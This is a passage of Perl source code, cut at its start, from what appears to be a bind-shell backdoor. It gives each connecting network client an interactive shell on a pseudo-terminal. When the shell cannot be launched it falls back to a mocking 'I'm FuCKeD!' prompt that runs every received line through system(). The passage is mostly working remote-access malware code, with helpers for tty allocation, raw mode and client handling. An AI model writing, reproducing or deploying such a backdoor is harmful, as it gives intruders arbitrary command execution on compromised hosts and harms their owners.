unless (($tty, $pty) = open_tty($cli)) {
finish_client($cli, "ERROR: No more pty?s avaliable\n");
return(undef);
}
my $pid = fork();
if (not defined($pid)) {
finish_client($cli, "ERROR: fork()\n");
return(undef);
}
unless($pid) {
close($pty);
local(*DEVTTY);
if (open (DEVTTY, "/dev/tty")) {
ioctl(DEVTTY, &TIOCNOTTY, 0 );# || die "erro: $!";
close(DEVTTY);
}
POSIX::setsid();
ioctl($tty, &TIOCSCTTY, 0);# || die "erro: $!";
open (STDIN, "<&".fileno($tty)) || die "I could not reopen STDIN: $!";
open (STDOUT, ">&".fileno($tty)) || die "I could not reopen STDOUT: $!";
open (STDERR, ">&".fileno($tty)) || die "I could not reopen STDERR: $!";
close($tty);
sleep(1);
foreach my $stty ("/bin/stty", "/usr/bin/stty") {
next unless (-x $stty);
map { system("$stty", $_) } @STTY;
}
chdir("$HOME");
{ exec("$SHELL") };
syswrite(STDOUT, "\n\nERROR: exec($SHELL)\n\nI could not execute the shell ($SHELL)\nHowever you are lucky :P\nYou can use the \"I'm FUCKED!\" mode and fix up this thing...\nTip: Find some shell and execute it ;)\n\n");
syswrite(STDOUT, "\n\nOK! I'm Fucked mode.\n");
syswrite(STDOUT, "Type ^C to exit\n\nI'm FuCKeD!# ");
while (my $msg = <STDIN>) {
$msg =~ s/\n$//;
$msg =~ s/\r$//;
if ($msg =~ /^\s*cd\s+(\S+)/) {
my $notf = "directory $1 not found!\n";
chdir($1) || syswrite(STDOUT, $notf, length($notf));
} else {
system("$msg 2>&1");
}
syswrite(STDOUT, "I'm FuCKeD!# ");
}
exit;
}
close($tty);
select($pty); $| = 1;
select(STDOUT);
set_raw($pty);
$CLIENT{$cli}->{shell} = $pty;
$sel_shell->add($pty);
return(1);
}
# Funciton set_raw() stolen from IO::Pty
sub set_raw($) {
my $self = shift;
return 1 if not POSIX::isatty($self);
my $ttyno = fileno($self);
my $termios = new POSIX::Termios;
unless ($termios) {
# warn "set_raw: new POSIX::Termios failed: $!";
return undef;
}
unless ($termios->getattr($ttyno)) {
# warn "set_raw: getattr($ttyno) failed: $!";
return undef;
}
$termios->setiflag(0);
$termios->setoflag(0);
$termios->setlflag(0);
$termios->setcc(&POSIX::VMIN, 1);
$termios->setcc(&POSIX::VTIME, 0);
unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) {
# warn "set_raw: setattr($ttyno) failed: $!";
return undef;
}
return 1;
}
sub open_tty {
no strict;
my $cli = shift;
my ($PTY, $TTY) = (*{"pty.$cli"}, *{"tty.$cli"}); # believe me old versions :/
for (my $i = 0; $i < 256; $i++) {
my $pty = get_tty($i, "/dev/pty");
next unless (open($PTY, "+> $pty"));
my $tty = get_tty($i, "/dev/tty");
unless(open($TTY, "+> $tty")) {
close($PTY);
next;
}
return($TTY, $PTY);
}
return();
}
sub get_tty {
my ($num, $base) = @_;
my @series = ('p' .. 'z', 'a' .. 'e');
my @subs = ('0' .. '9', 'a' .. 'f');
my $buf = $base;
$buf .= @series[($num >> 4) & 0xF];
$buf .= @subs[$num & 0xF];
return($buf);
}
sub safeload {
my ($module, $require, $arg) = @_;
my $file = $module;
$file =~ s/::/\//g;
if ($require) {
# all found gonna be loaded
map { eval ("require \"$_/$file\";") if(-f "$_/$file"); } @INC;
} else {
$file .= ".pm" unless ($file =~ /(\.pm|\.ph)$/);
return(eval("use $module $arg;")) if (grep { -f "$_/$file" } @INC);
}
return();
}
sub write_shell {
my ($cli, $msg) = @_;
my $shell = $CLIENT{$cli}->{shell};
return(undef) unless ($shell);
foreach my $m (split_chars($msg, 20)) {
read_shells();
print $shell $m;
read_shells();
}
return(1);
}
sub split_chars {
my ($msg, $nchars) = @_;
my @splited;
my @chrs = split ('', $msg);
my $done = 0;
while ( 1 ) {
my $splited = join('', @chrs[$done .. ($done+$nchars-1)]);
$done += $nchars;
last if (length($splited) < 1);
push(@splited, $splited);
}
return(@splited);
}
sub finish_client {
my ($cli, $msg) = @_;
write_client($cli, $msg);
close_client($cli);
}
sub close_client {
my $cli = shift;
my $sock = $CLIENT{$cli}->{sock};
$sel_serv->remove($sock);
if ($CLIENT{$cli}->{shell}) {
my $shell = $CLIENT{$cli}->{shell};
$sel_shell->remove($shell);
close($shell);
}
$sock->close() if($sock);
delete($CLIENT{$cli});
}
sub write_client {
my ($cli, $msg) = @_;
my $sock = $CLIENT{$cli}->{sock};
syswrite($sock, $msg, length($msg)) if ($sock);
}